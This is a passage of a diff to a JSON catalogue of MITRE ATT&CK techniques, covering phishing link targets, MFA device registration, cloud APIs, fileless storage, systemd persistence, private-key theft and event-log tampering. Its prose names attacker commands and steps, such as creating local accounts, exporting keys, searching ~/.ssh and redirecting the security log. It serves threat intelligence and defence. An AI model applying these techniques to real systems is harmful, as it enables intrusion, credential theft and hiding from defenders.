Roles](https://attack.mitre.org/techniques/T1098/003) - to maintain persistence and potentially escalate their privileges.",
"meta": {
"external_id": "T1078.004",
"kill_chain": [
@@ -18941,7 +19197,7 @@
"value": "Proc Memory - T1055.009"
},
{
- "description": "Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. \n\nTypically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)",
+ "description": "Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. \n\nTypically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)",
"meta": {
"external_id": "T1608.005",
"kill_chain": [
@@ -18956,6 +19212,7 @@
"refs": [
"https://attack.mitre.org/techniques/T1608/005",
"https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/",
+ "https://blog.talosintelligence.com/ipfs-abuse/",
"https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/",
"https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service",
"https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection",
@@ -18972,7 +19229,7 @@
"value": "Link Target - T1608.005"
},
{
- "description": "Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.\n\nMFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds)\n\nSimilarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)",
+ "description": "Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.\n\nMFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)",
"meta": {
"external_id": "T1098.005",
"kill_chain": [
@@ -18995,6 +19252,7 @@
"https://o365blog.com/post/mdm",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-074a",
"https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack",
+ "https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft",
"https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa",
"https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/"
]
@@ -19008,6 +19266,37 @@
"uuid": "7decb26c-715c-40cf-b7e0-026f7d7cc215",
"value": "Device Registration - T1098.005"
},
+ {
+ "description": "Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure for PowerShell(Citation: A), or software developer kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006). \n\nCloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.\n\nWith proper permissions (often via use of credentials such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001) and [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment. ",
+ "meta": {
+ "external_id": "T1059.009",
+ "kill_chain": [
+ "mitre-attack:execution"
+ ],
+ "mitre_data_sources": [
+ "Command: Command Execution"
+ ],
+ "mitre_platforms": [
+ "IaaS",
+ "Azure AD",
+ "Office 365",
+ "SaaS",
+ "Google Workspace"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1059/009",
+ "https://github.com/Azure/azure-powershell"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf",
+ "value": "Cloud API - T1059.009"
+ },
{
"description": "Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)\n\nTo help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)\n\nAdversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)\n\nSEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)",
"meta": {
@@ -19040,7 +19329,7 @@
"value": "SEO Poisoning - T1608.006"
},
{
- "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
+ "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
"meta": {
"external_id": "T1132.001",
"kill_chain": [
@@ -19095,7 +19384,36 @@
"value": "Symmetric Cryptography - T1521.001"
},
{
- "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
+ "description": "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage.\n\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored.\n\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.(Citation: Microsoft Fileless) ",
+ "meta": {
+ "external_id": "T1027.011",
+ "kill_chain": [
+ "mitre-attack:defense-evasion"
+ ],
+ "mitre_data_sources": [
+ "WMI: WMI Creation",
+ "Windows Registry: Windows Registry Key Creation"
+ ],
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1027/011",
+ "https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats",
+ "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "value": "Fileless Storage - T1027.011"
+ },
+ {
+ "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as username.(Citation: cisco_username_cmd)\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
"meta": {
"external_id": "T1136.001",
"kill_chain": [
@@ -19109,11 +19427,13 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
"https://attack.mitre.org/techniques/T1136/001",
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720"
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-t2.html#wp1047035630"
]
},
"related": [
@@ -19358,7 +19678,6 @@
"http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research",
"http://www.uefi.org/about",
"https://attack.mitre.org/techniques/T1542/001",
- "https://capec.mitre.org/data/definitions/532.html",
"https://en.wikipedia.org/wiki/BIOS",
"https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface",
"https://github.com/chipsec/chipsec",
@@ -19551,7 +19870,7 @@
"value": "Business Relationships - T1591.002"
},
{
- "description": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)\n\nAdversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.",
+ "description": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)\n\nAdversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.\n\nOnce an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).",
"meta": {
"external_id": "T1136.003",
"kill_chain": [
@@ -20162,7 +20481,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1566/001",
- "https://capec.mitre.org/data/definitions/163.html",
"https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide",
"https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf",
"https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql"
@@ -20323,7 +20641,7 @@
"value": "Device Lockout - T1629.002"
},
{
- "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:\n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)",
+ "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. \n\nSystemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`). (Citation: lambert systemd 2022) \n\nService unit files use the following directives to execute system commands:(Citation: freedesktop systemd.service) \n\n* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives cover execution of commands when a service is started manually by `systemctl`, or on system start if the service is set to automatically start.\n* `ExecReload` directive covers when a service restarts. \n* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives cover when a service is stopped. \n\nAdversaries may abuse systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files systemd uses upon reboot or starting a service.(Citation: Anomali Rocke March 2019) Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.\n\nThe `.service` file’s `User` directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions.(Citation: Rapid7 Service Persistence 22JUNE2016) ",
"meta": {
"external_id": "T1543.002",
"kill_chain": [
@@ -20344,10 +20662,10 @@
"refs": [
"http://man7.org/linux/man-pages/man1/systemd.1.html",
"https://attack.mitre.org/techniques/T1543/002",
- "https://capec.mitre.org/data/definitions/550.html",
- "https://capec.mitre.org/data/definitions/551.html",
+ "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/",
+ "https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/",
"https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
- "https://www.freedesktop.org/wiki/Software/systemd/",
+ "https://www.freedesktop.org/software/systemd/man/systemd.service.html",
"https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence"
]
},
@@ -20595,7 +20913,7 @@
"value": "TFTP Boot - T1542.005"
},
{
- "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.\n\nAdversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.",
+ "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)\n\nOn network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) \n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.",
"meta": {
"external_id": "T1552.004",
"kill_chain": [
@@ -20608,13 +20926,17 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
+ "https://aadinternals.com/post/deviceidentity/",
"https://attack.mitre.org/techniques/T1552/004",
"https://en.wikipedia.org/wiki/Public-key_cryptography",
"https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf",
- "https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/"
+ "https://learn.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token",
+ "https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_pki/configuration/xe-17/sec-pki-xe-17-book/sec-deploy-rsa-pki.html#GUID-1CB802D8-9DE3-447F-BECE-CF22F5E11436"
]
},
"related": [
@@ -20781,7 +21103,6 @@
"https://attack.mitre.org/techniques/T1498/002",
"https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/",
"https://blog.cloudflare.com/reflections-on-reflections/",
- "https://capec.mitre.org/data/definitions/490.html",
"https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf",
"https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf",
"https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/",
@@ -20883,6 +21204,35 @@
"uuid": "65013dd2-bc61-43e3-afb5-a14c4fa7437a",
"value": "Email Accounts - T1585.002"
},
+ {
+ "description": "Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.\n\nRather than accessing the stored chat logs (i.e., [Credentials In Files](https://attack.mitre.org/techniques/T1552/001)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation (Citation: Slack Security Risks).",
+ "meta": {
+ "external_id": "T1552.008",
+ "kill_chain": [
+ "mitre-attack:credential-access"
+ ],
+ "mitre_data_sources": [
+ "Application Log: Application Log Content"
+ ],
+ "mitre_platforms": [
+ "Office 365",
+ "SaaS",
+ "Google Workspace"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1552/008",
+ "https://www.nightfall.ai/blog/saas-slack-security-risks-2020"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "9664ad0e-789e-40ac-82e2-d7b17fbe8fb3",
+ "value": "Chat Messages - T1552.008"
+ },
{
"description": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)\n\nSilver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)\n\nPassword hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).",
"meta": {
@@ -20928,7 +21278,7 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1595/002",
- "https://wiki.owasp.org/index.php/OAT-014_Vulnerability_Scanning"
+ "https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning"
]
},
"related": [
@@ -20941,7 +21291,7 @@
"value": "Vulnerability Scanning - T1595.002"
},
{
- "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.\n\nIn Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).",
+ "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nFor example, adversaries may modify the `File` value in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) \n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.\n\nIn Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).",
"meta": {
"external_id": "T1562.006",
"kill_chain": [
@@ -20959,9 +21309,9 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1562/006",
- "https://capec.mitre.org/data/definitions/571.html",
"https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events",
"https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63",
+ "https://ptylu.github.io/content/report/report.html?report=25",
"https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/",
"https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A"
]
@@ -20976,7 +21326,7 @@
"value": "Indicator Blocking - T1562.006"
},
{
